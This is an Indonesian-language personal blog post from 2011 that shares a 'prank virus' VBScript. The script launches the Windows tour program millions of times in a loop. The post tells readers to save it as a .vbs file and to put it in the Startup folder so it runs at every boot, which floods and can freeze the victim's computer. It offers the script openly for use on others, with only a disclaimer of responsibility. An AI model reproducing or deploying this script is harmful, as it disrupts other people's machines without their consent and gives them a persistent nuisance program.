Selamat datang di Software RX.
Sebuah Blog yang menyediakan Beberapa Software gratis yang dibutuhkan dalam bekerja dan belajar. Slamat mencoba di Sotware RX SEmoga bermanfaat.

Virus vbs

Diposting oleh adam rx Jumat, 21 Oktober 2011

Kali ini aku pengen berbagi tentang sebuah trick. Tapi kalo ngeliat judulnya, kayaknya kurang pas dech. Lebih pasnya kalo diganti TRICK JAIL, hehehhe
Langsung aja dech gak usah banyak basa-basi. Trick ini adalah jail untuk menampilkan windows tour, tentunya kawan blogger semua tau kan, kalo belum tau za coba dicari tau di mbah e google tentang windows tour.
File ini di buat dengan notepad dan silahkan disimpan dengan extensi vbs.
berikut script nya bisa di COPAS : (ingat yang bercetak tebal saja za)



option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 5000000
wshshell.run "tourstart.exe"
next



 
setelah jadi, copasnya, simpan dengan nama sesuka hati anda.vbs
untuk mencoba silahkan duble klik file tersebut. tapi ingat !!!!! GANTI DULU ANGKA 5000000 MENJADI 5 agar tak sebegitu parah komputer kawan.
untuk dapat menjalankan file tersebut secara otomatis, anda dapat menaruhnya START>All Program >Startup . Maka file tersebut akan di execusi ketika booting awal windows.
Bisa kawan bayangkan, dalam sekali waktu sebuah komputer menampilkan tampilan windows tour shingga 5000000 tampilan. PENUH DECH DESKTOPNYA. hehehehhehhehe
Catatan : untuk resiko dan kerusakan yang ditimbulkan oleh percobaan kawan blogger, kami tidak bertanggung jawab, kami hanya sekedar share ilmu saja.


makasih


Salam RX

ADAM RX. Diberdayakan oleh Blogger.

oh belog